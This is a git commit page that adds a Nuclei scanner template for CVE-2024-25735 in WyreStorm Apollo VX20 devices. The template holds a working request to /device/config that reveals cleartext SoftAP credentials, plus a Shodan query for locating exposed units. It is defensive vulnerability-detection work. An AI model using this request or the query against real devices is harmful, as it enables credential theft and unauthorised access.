daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2024-25735.yaml

patch-1
johnk3r 2024-02-12 19:32:40 -03:00 committed by GitHub
parent 7c46896600
commit 4e9c4bc7b6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 31 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
http/cves/2024/CVE-2024-25735.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2024-25735
info:
name: WyreStorm Apollo VX20 - Incorrect Access Control
author: johnk3r
severity: high
description: An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
reference:
- https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10.0
cwe-id: CWE-94
cve-id: CVE-2024-25735
metadata:
verified: true
max-request: 1
vendor: WyreStorm
product: Apollo VX20
shodan-query: ssl:"WyreStorm Apollo VX20"
tags: cve,cve2024,wyrestorm
http:
- method: GET
path:
- "{{BaseURL}}/device/config"
matchers:
- type: word
words:
- "password"
- "softAp"